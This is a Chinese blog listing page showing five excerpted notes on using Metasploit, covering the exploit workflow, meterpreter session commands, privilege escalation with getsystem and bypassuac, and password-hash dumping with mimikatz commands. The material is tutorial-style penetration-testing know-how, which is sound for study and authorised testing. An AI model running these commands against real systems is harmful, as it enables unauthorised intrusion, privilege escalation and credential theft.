- 博客(5)
- 收藏
- 关注
原创 meterpreter使用攻略
后渗透之meterpreter使用攻略Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。0x01.系统命令1)基本系统命令sessions #sessions –h 查看帮助sessions -i <ID值> #进入会话 -k 杀死会话background #将当前会话放置后台run #执行已有的模块,输入r
2020-10-20 17:17:09 1065
原创 msf提权
getuid 当前用户getsystem 提权bypassuac 提权显示会话 sessions -i进入一个会话 session -i 1load mimikatz 获取帐号密码wdigest 获取密码mimikatz_command -f samdump::hashes取得原始加密密码mimikatz_command -f sekurlsa::searchPasswordsuse exploit/windows/local/bypassuacset SESSION 2ru
2020-10-20 16:58:36 187
原创 MSF使用流程
1、天镜、nessus、极光扫描器进行漏洞扫描,跟据漏扫结果去msf里面进行查找漏洞利用工具2、打开msf 通过search搜漏洞编号或漏洞名称3、搜到漏洞之后,用use 打开msf漏洞利用工具4、输入info查看工具相关说明5、用show options 查看工具使用方法6、配置受害者ip set rhosts /set rport set payload7、攻击run 或者exploit...
2020-10-19 17:42:06 261
原创 2020-10-19
系统漏洞利用过程:1、天镜、nessus、极光扫描器进行漏洞扫描,跟据漏扫结果去msf里面进行查找漏洞利用工具2、打开msf 通过search搜漏洞编号或漏洞名称3、搜到漏洞之后,用use 打开msf漏洞利用工具4、输入info查看工具相关说明5、用show options 查看工具使用方法6、配置受害者ip set rhosts /set rport set payload7、攻击run 或者exploit...
2020-10-19 14:41:43 85
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人